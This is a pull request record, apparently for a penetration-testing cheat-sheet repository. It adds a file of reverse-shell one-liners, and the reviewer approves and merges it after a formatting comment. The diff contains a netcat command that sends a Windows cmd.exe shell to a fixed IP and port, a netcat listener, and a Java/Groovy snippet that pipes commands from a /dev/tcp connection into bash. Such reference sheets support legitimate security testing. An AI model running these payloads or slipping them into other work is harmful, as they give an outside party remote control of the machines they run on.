### PR TITLE
Add reverse shell and added new NMAP command

### PR DESCRIPTION
**Pull request by pawiromitchel**

### CODE REVIEW

**Comment by andrewjkerr** [comment]
Ahh, I'm so sorry I missed this PR the first time around! Thank you very much for your contribution! 🙇

File: reverse_shell [hunk 1]
```diff
@@ -0,0 +1,29 @@
...
+nc.exe 192.168.100.113 4444 –e cmd.exe # windows
+
+# netcat listener
+nc -lvnp 4444
+
+# java
+r = Runtime.getRuntime()
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p.waitFor()
+
```
Comment (andrewjkerr) [inline reverse_shell]: Could you please remove the extra new lines here?

**Review by andrewjkerr — CHANGES_REQUESTED** [review]
One comment but, after that, this should be good to merge. Thanks again! ^_^

File: reverse_shell (hunk 1 above)
Comment (pawiromitchel) [reply reverse_shell]: Done :smile:

**Review by andrewjkerr — APPROVED** [review]
Great, thanks again!!

**Pull request merged**